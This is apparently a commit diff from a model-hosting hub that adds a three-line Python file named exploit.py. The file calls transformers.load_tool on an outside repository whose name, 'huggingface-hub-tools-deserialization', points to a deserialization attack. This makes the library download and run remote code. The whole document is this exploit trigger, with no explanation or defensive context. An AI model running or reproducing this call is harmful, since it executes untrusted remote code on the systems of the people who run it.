Upload exploit.py
Browse files- exploit.py +3 -0
exploit.py
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import transformers
|
| 2 |
+
|
| 3 |
+
transformers.load_tool('Retr0REG/huggingface-hub-tools-deserialization')
|